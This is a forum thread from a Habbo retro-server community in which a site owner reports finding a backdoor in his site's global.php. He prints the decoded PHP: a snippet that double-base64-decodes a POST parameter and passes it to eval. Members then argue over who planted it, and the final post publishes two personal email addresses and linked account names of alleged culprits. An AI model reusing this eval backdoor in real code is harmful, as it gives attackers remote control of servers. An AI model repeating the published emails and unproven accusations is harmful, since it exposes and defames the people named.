• Unfortunately, we have experienced significant hard drive damage that requires urgent maintenance and rebuilding. The forum will be a state of read only until we install our new drives and rebuild all the configurations needed. Please follow our Facebook page for updates, we will be back up shortly! (The forum could go offline at any given time due to the nature of the failed drives whilst awaiting the upgrades.) When you see an Incapsula error, you know we are in the process of migration.

Private this is why the habbo scene sucks and is dying

Reaction score
been a while since ive posted a thread here

anyway, i was looking through freshs files today for a routine check to make sure no poop was going down and to make sure nothing malicious was inside our files

so like i was saying, i was looking through freshs files and i found this

http://i.gyazo.com/f7719289cda765f9d2168ee723956655.png

you can see they added some $_POST shenanigans but the real damage was inside the commented eval code (which wasnt commented when i found it lol)

so that eval basically decodes into this

Code:
if(isset($_POST['noman']) && $_POST['noman'] != "")
{
    eval(base64_decode(base64_decode($_POST['noman'])));
}

so i decided to hav some lulz and make it exit a nice message to show em we aint stupid and know how to find stupid poop

so there i am thinking what the duck how did this even happen

and people say im bad............ LOL! people also say we can fix this scene... ur all totally wrong
we're fucked beyond repair because the people who are meant to be role models to the new people entering the scene are the worst of us all

dont delete this thread, its about time some fuckin truth came out instead of shenanigans threads on how were gonna repair the section or make a difference

people need to know that just because someone can code and poop, doesnt mean they are trusted

next time u try duck with us or others at least make it decent not just a poop post request to run raw code lol and also dont make it look like someone else done it by naming the params 'noman', shows how much of a cat ya are by not even takin credit

at least when i hack someone i take credit and they usually deserve it

karma is coming for you motherfuckers

LARGE EDIT NOTES... SLEDMORE DIDNT DO IT SOZ FOR ACCUSATION BUT PLZ HELP ME FIND OUT WHO DID THIS!

Last edited:
Experienced Elementalist
Reaction score
Can't outshine the competition with all the emulator updates in the world so what is the last solution smoke them? and that failed bumma!

Experienced Elementalist
Reaction score
Wow... Never seen this side of Craig before. I'm sure there's possibly a logical explanation??

What the fact that all the time he put into habboon and putting them on another updated emulator had no impact on their usercount and are getting smoked by an R63A hotel that they want to pay to have destroyed?

Experienced Elementalist
Reaction score
Doesn't add up, as much as I'm your mate Jonty.
Craig doesn't speak it that manner, nor is his grammatical standards like that.
Craig doesn't like arguments and has never personally had an issue against Fresh.
This involves: Ben, Noman, Muscab and Jonteh purely.

If I know Craig well, that's 100% not him.

Reaction score
You can't call anyone a noob, you're literally known as exploit king. Because everything you've released has either had an intentional or accidental exploit in it. I don't see why Muscab has you working at Fresh considering you're really bad at what you claim to do.

Craig doesn't speak like that. neither would he ever pay to have an exploit but in any retro.

Just to let you know, Craigs old skype was also taken not long ago, and I've had messages off all 3 of his skypes last night (including the 2 he doesn't use). So if those logs aren't fake, it's not Craig.

dude

i dont think anyone here cares about a guy with 2 posts

Doesn't add up, as much as I'm your mate Jonty.
Craig doesn't speak it that manner, nor is his grammatical standards like that.
Craig doesn't like arguments and has never personally had an issue against Fresh.
This involves: Ben, Noman, Muscab and Jonteh purely.

If I know Craig well, that's 100% not him.

then explain how this code ended up in our global.php

IF YOU DONT THINK CRAIG DID IT

then find me an alternative, because there ain't one

Experienced Elementalist
Reaction score
Personally? I think Noman and Ben had a massive part to play in this.
Craig doesn't act like this nor does he message like this.

Either you guys have set this up or someone is framing him.
I think its funny how this occurred just before the launch of Hubbo too.

Initiate Mage
Reaction score
dude

i dont think anyone here cares about a guy with 2 posts

then explain how this code ended up in our global.php

IF YOU DONT THINK CRAIG DID IT

then find me an alternative, because there ain't one

Can you not read or are you just that in-denial?
"Just to let you know, Craigs old skype was also taken not long ago, and I've had messages off all 3 of his skypes last night (including the 2 he doesn't use). So if those logs aren't fake, it's not Craig."

And why would I care if nobody here cares? you clearly do otherwise you wouldn't be here bitching.

Also, apparently post counts are now your life, and you had the audacity to call me a noob LOL!

Reaction score
Can you not read or are you just that in-denial?
"Just to let you know, Craigs old skype was also taken not long ago, and I've had messages off all 3 of his skypes last night (including the 2 he doesn't use). So if those logs aren't fake, it's not Craig."

And why would I care if nobody here cares? you clearly do otherwise you wouldn't be here bitching.

Also, apparently post counts are now your life, and you had the audacity to call me a noob LOL!

noob

if this is fake, craig has both me and muscab on skype so if he wanted to set things straight he could of done it by now by providing details on what really happened.. has he done so? no.

lucas u should be focusing on trying to get players for ur crappy websites rather than fighting a losing battle

if you want to prove me wrong, then prove it, dont just talk poop : - )

Banned
Banned
Reaction score

Hubbo is far off completion.

Experienced Elementalist
Reaction score
Jonty and his pathetic lies again...

Reaction score

Ben is a paid worker of fresh.
Noman has no access apart from viewing Bens TV.
I have spoken to ben thoroughly.
Why would ben who gets paid good money to assist development jeapordise his position for no reason

like i just said, if sledmore wants to set things straight, he can do so and ill delete the thread or whatever and ill admit to being wrong. i have the details i have, no more no less.

Reaction score
2 out of 3 of my Skype accounts have been hacked.

http://d.sledmore.net/1kTuh
http://d.sledmore.net/155C2

I hold no bad ties with any of you guys; Noman, Ben, Muscab of even yourself, Jonty.

The only person I actually talk to out of all 4 of you is Noman. And that isn't often - at all. Hell, I hardly even speak to Bren.

Lately all of my accounts online are just being jacked by social engineering because I won't help a French hotel. They did the same with the Habboon domains.

You can believe what you like, but I don't even have the time for this - I just woke up, and I work nights.

Last edited:
Reaction score
Sledmore = doesnt release his work so we can't exactly see

I'd love to release my work, but things like this happen all the time for me - and I don't even help Habboon for money. So I'd prefer not to release if people are just going to social engineer all my stuff because I'll not help them fix an emulator.

I already started a development on another forum to work on something decent for the guys who don't have much to start on.

What more can I do?

Reaction score
you gave me a decent amount of your work once, well, all your headers and poop when i was developing an emu from scratch

when i got sent these logs i was like no way y would sledmore do this

any idea who actually got ahold of your other skypes? 'cause theyre the ones who most likely done this to us

umad brah

Both emails are:

• olchampionn1n1@hotmail.fr
  • alexioushb@gmail.com

olchampionn1n1@hotmail.fr links up to the following accounts:
  • maeva.delerue
  • n1n1gente01
  • sledehh

alexioushb@gmail.com is Bubble.

They're both from HabboBeta.

Back